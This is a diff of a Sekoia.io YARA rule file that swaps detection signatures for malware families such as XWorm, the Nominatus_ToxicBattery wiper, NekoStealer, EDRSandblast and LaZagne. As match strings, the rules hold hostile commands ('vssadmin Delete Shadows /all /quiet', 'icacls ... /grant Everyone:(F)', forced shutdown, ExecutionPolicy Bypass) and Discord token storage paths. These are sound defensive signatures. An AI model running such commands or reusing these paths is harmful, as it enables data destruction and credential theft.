@@ -245786,64 +245677,66 @@ rule SEKOIA_Rat_Win_Xworm_V3 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "$VB$Local_Port" ascii
-		$str02 = "$VB$Local_Host" ascii
-		$str03 = "get_Jpeg" ascii
-		$str04 = "get_ServicePack" ascii
-		$str05 = "Select * from AntivirusProduct" wide
-		$str06 = "PCRestart" wide
-		$str07 = "shutdown.exe /f /r /t 0" wide
-		$str08 = "StopReport" wide
-		$str09 = "StopDDos" wide
-		$str10 = "sendPlugin" wide
-		$str11 = "OfflineKeylogger Not Enabled" wide
-		$str12 = "-ExecutionPolicy Bypass -File \"" wide
-		$str13 = "Content-length: 5235" wide
+		$ = "Unload Driver Error 1"
+		$ = "Failed to create pipe. Error %d"
+		$ = "icacls \"%s\" /grant Everyone:(F)"
+		$ = "Register MiniFilter Callback driver:"
+		$ = "The driver's certificate has been revoked,"
+		$ = "[Success] Killed %s(%s)."
+		$ = "ntoskrnl.exe base address not found."
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Apt_Unk_Malicious_Lnk : FILE
+rule SEKOIA_Evilnumpayload_Fmtstr
 {
 	meta:
-		description = "Detects a malicious LNK used by an APT"
+		description = "Detect payload of EvilNum"
 		author = "Sekoia.io"
-		id = "d2248803-7ddf-4cde-ab6a-78b20e760919"
-		date = "2024-09-06"
+		id = "980c58e4-e04d-4076-a92e-2c04ced19ece"
+		date = "2022-07-25"
 		modified = "2024-12-19"
-		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_malicious_lnk.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/evilnumpayload_fmtstr.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "a8d7e56eb01a8cf576533db9af2e92ec"
-		logic_hash = "993411ceba45d1212a4840e6a35b72b52e64e78cbb2599ebc5c70c2fd3b8e552"
+		logic_hash = "7aa55d0677e58658bb76a2d7386a7434011b5f9b8c9de1b718c37f85907ddcc3"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".pdf.lnkPK"
-		$ = ".jfifPK"
-		$ = ".batPK"
-		$ = ".pdfPK"
+		$fmtstr01 = "{\"v\":\"" ascii wide
+		$fmtstr02 = ",\"u\":\"" ascii wide
+		$fmtstr03 = ",\"a\":\"" ascii wide
+		$fmtstr04 = ",\"w\":\"" ascii wide
+		$fmtstr05 = ",\"d\":\"" ascii wide
+		$fmtstr06 = ",\"n\":\"" ascii wide
+		$fmtstr07 = ",\"r\":\"1\"" ascii wide
+		$fmtstr08 = ",\"r\":\"0\"" ascii wide
+		$fmtstr09 = ",\"xn\":\"" ascii wide
+		$fmtstr10 = ",\"s\":0}" ascii wide
+		$fmtstr11 = "{\"u\":\"" ascii wide
+		$fmtstr12 = "\",\"sc\":1" ascii wide
+		$fmtstr13 = ",\"dt\":\"" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x504b0304 and all of them
+		8 of ( $fmtstr* )
 }
-rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
+
+rule SEKOIA_Wiper_Win_Nominatus_Toxicbattery : FILE
 {
 	meta:
-		description = "Find initial loader of Enigma Stealer based on specific strings"
+		description = "Detect the Nominatus_ToxicBattery malware"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f00"
-		date = "2023-01-30"
+		id = "0262378f-f509-4ea4-a3eb-cd0183c4361d"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_initial_loader.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_nominatus_toxicbattery.yar#L4-L42"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "03b9d7296b01e8f3fb3d12c4d80fe8a1bb0ab2fd76f33c5ce11b40729b75fb23"
-		logic_hash = "b7687a480a2a633e7cc9a60d62f3392011712bd018ed634927419cfb4edb4a78"
+		logic_hash = "c226a4c3bcc451482eb782c1cb84f3e956be1e214368d1b315076078d3148955"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245851,58 +245744,63 @@ rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "/getFile?file_id=" ascii
-		$str02 = "/file/bot" ascii
-		$str03 = "?file_id=" ascii
-		$str04 = "pInternetSetOptionA failed" wide
-		$str05 = "list_messages[file_path] failed" wide
-		$str06 = "iE&xit" wide
-		$str07 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
-		$str08 = "Telegram request failed" wide
-		$str09 = "bot getted" wide
+		$ = "DISK"
+		$ = "FileNaME"
+		$ = "FILNAME"
+		$ = "runCommand"
+		$ = "HAHAH"
+		$ = "Damage"
+		$ = "fastInfector"
+		$ = "d:\\again\\SharpDevelop Projects\\RInjector\\Virus.win32RozbehStrike\\obj\\Debug\\Nominatus_ToxicBattery.pdb"
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" wide
+		$ = "\\Antivirus.bat" wide
+		$ = "\\Antivirus3.vbs" wide
+		$ = "vssadmin Delete Shadows /all /quiet" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16( 0 ) == 0x5A4D and 10 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e7f35c173c34b7080d437a90ec90a982" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "2e25c5d3baba182f008a5a15c6f06403" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "70b1c002e4c0c9782c7ce1ef4a13c58ec1da54a26fd06dd7821a71f29431da82" )
 }
-rule SEKOIA_Pe_Princeransomware_Strings : FILE
+rule SEKOIA_Infostealer_Win_Nekostealer : FILE
 {
 	meta:
-		description = "Prince Ransomware exe files"
+		description = "Detect the NekoStealer infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "9c5cad6e-2b11-469c-ace1-2dc51562b035"
-		date = "2024-08-07"
+		id = "8b7d2708-9d33-4855-8e02-f6afedb7dda8"
+		date = "2023-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_princeransomware_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nekostealer.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "8bd8de169f45e32bab53f6e06088836d6f0526105f03efa1faf84f3b02c43011"
-		hash = "a83aad6861c8fdfe2392b8e286ab7051d223c6b0bbba5996165964f429657a37"
-		logic_hash = "18577c5673b4fc5280dee88aefac3747c254a97fdc84b584af241277361f6400"
+		logic_hash = "f027775bebb48ceb128392040ec2ac8ad84f2a2009760c040e4d376c2f06b663"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "https://i.imgur.com/RfsCOES.png" ascii
-		$ = {596f75722066696c65732068617665206265656e20656e63727970746564207573696e67205072696e63652052616e736f6d77617265}
+		$nek = "NekoStealer.Stealing" ascii
+		$str01 = "\\Local Storage\\leveldb" wide
+		$str02 = "======================= Discord Tokens =======================" wide
+		$str03 = "======================== IP Information ========================" wide
+		$str04 = "https://ipapi.co/" wide
 
 	condition:
-		all of them and uint16( 0 ) == 0x5a4d and filesize > 1MB
+		uint16( 0 ) == 0x5A4D and ( #nek > 10 or all of ( $str* ) )
 }
-rule SEKOIA_Infostealer_Win_Phoenixwave : FILE
+rule SEKOIA_Tool_Edrsandblast_Kernelcallbacks : FILE
 {
 	meta:
-		description = "Detect the PhoenixWave infostealer based on specific strings"
+		description = "Detects EDRSandblast KernelCallbacks strings"
 		author = "Sekoia.io"
-		id = "67c05ea8-2f1b-4c60-b108-e05d7d0c6508"
-		date = "2022-04-07"
+		id = "74cf4444-5bd6-4167-930a-5dbf2e529f92"
+		date = "2024-11-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_phoenixwave.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_kernelcallbacks.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "efeffb2f0df4c2f8156c401bac5f44c415c4c3e02e84e8db55dad68488f39fea"
+		logic_hash = "ffb1185dca42c5b2b273c3a48f3ba86204a3474a9a045f72dbdb0ba7c9e89c7d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245910,70 +245808,51 @@ rule SEKOIA_Infostealer_Win_Phoenixwave : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "##################################################\n                  Information\n##################################################\n" wide
-		$str1 = "Specify a single character: either D or F" wide
-		$str2 = "// This SFX source file was generated by DotNetZip " wide
-		$str3 = "aHR0cDovL2lwLWFwaS5jb20vanNvbg==" wide
-		$str4 = "TG9jYWxBcHBEYXRh" wide
-		$str5 = "UGhvZW5peFdhdmU=" wide
-		$str6 = "virustotal" wide
-		$str7 = "SELECT * FROM win32_operatingsystem" wide
-		$str8 = "SELECT * FROM Win32_VideoController" wide
-		$app0 = "\\discordcanary\\Local Storage\\leveldb" wide
-		$app1 = "\\discordptb\\Local Storage\\leveldb" wide
-		$app2 = "\\discorddevelopment\\Local Storage\\leveldb" wide
-		$app3 = "\\D877F783D5D3EF8C\\" wide
-		$app4 = "\\IndexedDB\\file__0.indexeddb.leveldb" wide
-		$app5 = "\\Steam\\Games.txt" wide
-		$app6 = "nkbihfbeogaeaoehlefnkodbefgpgknn" wide
-		$app7 = "fhbohimaelbohpjbbldcngcnapndodjp" wide
-		$app8 = "fnjhmkhhmkbjkkabndcnnogagogbneec" wide
-		$app9 = "\\Opera Software\\Opera GX Stable" wide
+		$ = "[+] '%s' service ACL configured to for Everyone" wide
+		$ = "%s callback of EDR driver \"%s\" [callback addr: 0x%I64x" wide
+		$ = "[!] Could not resolve %s kernel module's address" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of ( $str* ) and 8 of ( $app* )
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
 }
-rule SEKOIA_Hacktool_Duplicatedump_Strings : FILE
+rule SEKOIA_Downloader_Win_Donot
 {
 	meta:
-		description = "Detects Duplicate Dump"
+		description = "Detect the DoNot's downloader malware. There are big binaries in downloader strings."
 		author = "Sekoia.io"
-		id = "081d0124-4afe-418b-9767-3d987c0107ca"
-		date = "2023-11-22"
+		id = "31b153cc-a4b9-40a0-8bcb-ce1370645b4b"
+		date = "2023-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_duplicatedump_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_donot.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "feff083ed432781884941fc02eee6d6ce54f70f1b85d24db2f3e1d0147a81a7a"
+		logic_hash = "f6a03e6cfda74c1fbb1e8939a66735498d604a821b8b51492c2c5c6a46a38b6e"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "7d872e921a4b4b1b8b295395099b0209" wide ascii
-		$ = "[+] Named pipe connected and replying with current PID" wide ascii
-		$ = "[X] Named pipe connection error:" wide ascii
-		$ = "[X] Error occur while compressing file:" wide ascii
-		$ = "[+] Dump file saved to" wide ascii
+		$ = "001100000011000100110001001100000011000000110000001100010011000100110000001100010011000100110000001100010011000100110000001100010011"
+		$ = "01010011011011110110011001110100011101110110000101110010011001010101110001001101011010010110001101110010011011110111001101101111011001100111010001011100010101110110100101101110011001000110111101110111011100110101110001000011011101010111001001110010011001010110111001110100010101100110010101110010011100110110100101101111011011100101110001010101011011100110100101101110011100110111010001100001011011000110110000000000"
+		$ = "0101110001110011011110010111001101110100011001010110110100110011001100100101110001110010011101010110111001100100011011000110110000110011001100100010111001100101011110000110010100000000"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 4 of them
+		1 of them
 }
-rule SEKOIA_Tool_Nssm_Strings : FILE
+rule SEKOIA_Trojan_And_Keepspy : FILE
 {
 	meta:
-		description = "Detects nssm tool"
+		description = "Finds KeepSpy samples based on specific strings"
 		author = "Sekoia.io"
-		id = "fab99d44-6494-4bfc-80c0-67c45bad0425"
-		date = "2024-09-06"
+		id = "9390e7c8-a996-45cc-b642-c23d4b7dcf34"
+		date = "2023-06-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_nssm_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_and_keepspy.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "beceae2fdc4f7729a93e94ac2ccd78cc"
-		logic_hash = "ca883f3ed9f510cbcd9b96ad167e9d6725341c311b023f22edcba721e801f07d"
+		logic_hash = "03a954a5585a9a80fdc5a0cd2644a819c540d43b260e040b627530ca88ee08fa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245981,81 +245860,89 @@ rule SEKOIA_Tool_Nssm_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "nssm start <servicename>" wide
-		$ = "nssm stop <servicename>" wide
-		$ = "nssm restart <servicename>" wide
-		$ = "nssm status <servicename>" wide
-		$ = "nssm rotate <servicename>" wide
+		$str01 = "Characters entered %1$d of %2$d" ascii
+		$str02 = "com.google.android.material.behavior.HideBottomViewOnScrollBehavior" ascii
+		$str03 = "com/j256/ormlite/core/VERSION.txt" ascii
+		$str04 = "res/raw/empty.wav" ascii
+		$str05 = "res/mipmap/ic_launcher.png" ascii
+		$str06 = "res/interpolator/fast_out_slow_in.xml" ascii
+		$str07 = "OnePixelActivity" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
+		uint32be( 0 ) == 0x504B0304 and 6 of them and filesize > 2MB
 }
 
-rule SEKOIA_Implant_Win_Lyceum : FILE
+rule SEKOIA_Backdoor_Win_Headertip : FILE
 {
 	meta:
-		description = "Detect the DnsSystem malware used by Lyceum in March 2022"
+		description = "Detect HeaderTip backdoor used by the Chinese threat actor Scarab. This backdoor has its hardcoded C2 in strings"
 		author = "Sekoia.io"
-		id = "e061562f-9c17-4ef4-b7f9-2c6708bb6570"
-		date = "2022-06-13"
+		id = "82899406-4ec3-41d2-bcc1-bdd1ee440e77"
+		date = "2022-03-25"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_lyceum.yar#L4-L30"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_headertip.yar#L4-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f6b4acf48877c1dd62fd2bfa19d701b0a79f052ec44fc5d4fe3dc7b02aa689c8"
+		logic_hash = "289764df590cd2719d4d4e0dd66f7d8ebb4714d42eea4bb76c47a2b867a113de"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e1523185eac41a615b8d2af8b7fd5fe07b755442df2836041be544dff6881237"
+		hash2 = "da8a98d9b9a3c176ba44fb69ad0a820a971950e05f1eb0c4bbbf6c2fbb748bdc"
+		hash3 = "63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1"
 
 	strings:
-		$ = "$02c7afab-7f96-4dfa-b452-832e3624e270" ascii
-		$ = "C:\\Users\\u1\\Downloads\\Compressed\\article_src\\DnsDig\\DnsDig\\obj\\Release\\DnsDig.pdb" ascii
+		$post = "POST" wide
+		$ua = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d0e0c140e4831f835bcdcc6b463f3acc" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "22c92a1ba6ffd828637d7045261db7a45608ddd6d7c85836af011b3c679c725f" )
+		( uint16( 0 ) == 0x5A4D and $post at 7256 and $ua at 7304 and filesize < 10KB ) or pe.imphash ( ) == "60d01115d6baa0f214990c6e19339133" or hash.md5 ( pe.rich_signature.clear_data ) == "48f9cf422144c033e2ca183f72587910"
 }
-rule SEKOIA_Tool_Rathole_Strings : FILE
+rule SEKOIA_Loader_Win_Goshellcode : FILE
 {
 	meta:
-		description = "Detects RATHole based on strings"
+		description = "Finds GoShellcode samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "39d11285-a3bf-46c3-901d-ab46601a9066"
-		date = "2024-05-23"
+		id = "61346225-325a-4067-a4d6-3b8c001dd380"
+		date = "2023-11-15"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rathole_strings.yar#L1-L25"
+		reference = "https://github.com/yoda66/GoShellcode/blob/main/gosc.go"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_goshellcode.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f7c42328a38b2c101ea2d179b6adf9cf3d842d9e1c91e85fc6e684ee4f82458f"
+		logic_hash = "48ec87f284fbd14cbdb6b6b0f2e0fa6eb5ea19f112648660e0b8e525c562e3fc"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "94445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a6101906"
+		hash2 = "fdea8b01b2597ceafe6f08b5fd12cc603b1e3ce2037731c0b6defde6935b1ce0"
 
 	strings:
-		$ = "rathole\\src\\" ascii
-		$ = "\\\\?\\\\\\?\\UNC\\" wide
-		$ = "rathole::" ascii
-		$ = "src/server.rs"
-		$ = "`[server]` or `[client]"
+		$str01 = "main.VirtualAlloc" ascii
+		$str02 = "main.RtlMoveMemory" ascii
+		$str03 = "syscall.Syscall" ascii
+		$str04 = "syscall.NewLazyDLL" ascii
+		$str05 = "runtime.getGetProcAddress" ascii
+		$str06 = "runtime.useAeshash" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
+		uint16( 0 ) == 0x5A4D and all of ( $str* ) and filesize < 8MB
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Variant : FILE
+rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
 {
 	meta:
-		description = "Detects PowerShower"
+		description = "Finds PennyWise samples based on strings"
 		author = "Sekoia.io"
-		id = "416d0cb0-bc59-47ae-8a98-d7b39f8108ab"
-		date = "2023-12-20"
+		id = "9852b7e7-dfff-44e6-9068-d287cc84b069"
+		date = "2023-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_variant.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_pennywise_mar23.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7bcfafd5a52d685fe33715c8c3725d95947c65863902fde05cf85685a6bfeab8"
+		logic_hash = "55d7d6894de23af38230eaaff0a38c31d11d3df34aacd21fd93393d266c9357c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246063,60 +245950,64 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Variant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[System.Text.Encoding]::" ascii wide
-		$s2 = "{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}" ascii wide
+		$chr01 = "MvgmsudRT3loHygSj1F9K" ascii
+		$chr02 = "WebInfidelity2023" ascii
+		$chr03 = "PennyWise" ascii
+		$str01 = "get_Handle" ascii
+		$str02 = "get_Now" ascii
+		$str03 = "get_Ticks" ascii
+		$str04 = "set_Expect100Continue" ascii
+		$str05 = "get_Jpeg" ascii
+		$str06 = "set_UseShellExecute" ascii
+		$str07 = "get_ProcessName" ascii
+		$str08 = "get_UtcNow" ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $chr* ) and 5 of ( $str* )
 }
-rule SEKOIA_Evilnumpayload_Fmtstr
+rule SEKOIA_Platypus_Winlinmac_Strings : FILE
 {
 	meta:
-		description = "Detect payload of EvilNum"
+		description = "Catch Platypus based on strings"
 		author = "Sekoia.io"
-		id = "980c58e4-e04d-4076-a92e-2c04ced19ece"
-		date = "2022-07-25"
+		id = "4519448d-b91b-4794-9521-359b8cf4af78"
+		date = "2023-12-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/evilnumpayload_fmtstr.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/platypus_winlinmac_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7aa55d0677e58658bb76a2d7386a7434011b5f9b8c9de1b718c37f85907ddcc3"
+		logic_hash = "3c8e928fb8328381997230d4b60de20d07a9a3aee006aad9fc0b67fcfe61a63b"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1.1"
+		tags = "FILE"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fmtstr01 = "{\"v\":\"" ascii wide
-		$fmtstr02 = ",\"u\":\"" ascii wide
-		$fmtstr03 = ",\"a\":\"" ascii wide
-		$fmtstr04 = ",\"w\":\"" ascii wide
-		$fmtstr05 = ",\"d\":\"" ascii wide
-		$fmtstr06 = ",\"n\":\"" ascii wide
-		$fmtstr07 = ",\"r\":\"1\"" ascii wide
-		$fmtstr08 = ",\"r\":\"0\"" ascii wide
-		$fmtstr09 = ",\"xn\":\"" ascii wide
-		$fmtstr10 = ",\"s\":0}" ascii wide
-		$fmtstr11 = "{\"u\":\"" ascii wide
-		$fmtstr12 = "\",\"sc\":1" ascii wide
-		$fmtstr13 = ",\"dt\":\"" ascii wide
+		$pl1 = "platypus.go" ascii
+		$pl2 = "Platypus/lib/context/server.go" ascii
+		$pl3 = "Platypus/lib/context/context.go" ascii
+		$pl4 = "Platypus/lib/context/client.go" ascii
+		$pl5 = "github.com/WangYihang/" ascii
+		$f1 = "reflection/reflection.go" ascii
+		$f2 = "socksUsernamePassword" ascii
+		$go = "/golang" ascii
 
 	condition:
-		8 of ( $fmtstr* )
+		uint32( 0 ) == 0x464c457f and 4 of ( $pl* ) and 1 of ( $f* ) and #go > 30
 }
-rule SEKOIA_Apt_Badmagic_Generic_Pshscript : FILE
+rule SEKOIA_Hacktool_Lazagne_Strings : FILE
 {
 	meta:
-		description = "Detects BadMagic generic powershell script (Possible FPs)"
+		description = "Detects LaZagne hacktool based on strings"
 		author = "Sekoia.io"
-		id = "82cda554-3c2b-4c04-b9f9-b5ba50c53271"
-		date = "2023-05-15"
+		id = "5a5e7a07-1252-48cc-ada5-46e796c4e00e"
+		date = "2022-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_generic_pshscript.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_lazagne_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f442e1ba815cc7eae0c627db5ad1917021d69b8ce37155923a0f19776aeba95d"
+		logic_hash = "a6db351fee9a28b1a6d82c2ce063088a1050ee8379cc13ca3cf8cc2038043951"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246124,49 +246015,57 @@ rule SEKOIA_Apt_Badmagic_Generic_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ExecutablePath"
-		$ = "Start-Sleep -Second 2"
+		$w1 = "lazagne.softwares"
+		$w2 = "pypykatz.lsadecryptor"
+		$l0 = "PyModule_GetDict"
+		$l1 = "softwares.sysadmin.filezilla"
+		$l2 = "softwares.walle"
+		$l3 = "softwares.databases.sqldeveloper"
+		$l4 = "softwares.wifi.wpa_supplicant"
 
 	condition:
-		all of them and filesize < 1KB
+		( uint32be( 0 ) == 0x7f454c46 and all of ( $l* ) ) or ( uint16be( 0 ) == 0x4d5a and all of ( $w* ) ) and filesize < 40MB
 }
-rule SEKOIA_Implant_Any_Sliver_Not_Stripped : FILE
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Launcher : FILE
 {
 	meta:
-		description = "Rule which detects non stripped Sliver PE/Dlls/ELFs/MAC-O."
+		description = "Detects Gelsemium's WolfsBane launcher"
 		author = "Sekoia.io"
-		id = "35543c7c-c39b-4f96-b37c-1d27736e40fc"
-		date = "2021-11-08"
+		id = "26fbf4df-aa08-47b6-a73c-e8f80a408454"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_any_sliver_not_stripped.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_launcher.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5240f3ea1fb421697eeb12eb17d0b31c036b53f39c3a590473d87065b5d28e3e"
+		hash = "87e437cf74ce4b1330b8af9ff71edae2"
+		logic_hash = "9ecc3a8cb82f6183c263dde03a14f721d2e3aeb2338afc28e0368c323e5d51a9"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		modification_date = "2021-12-22"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
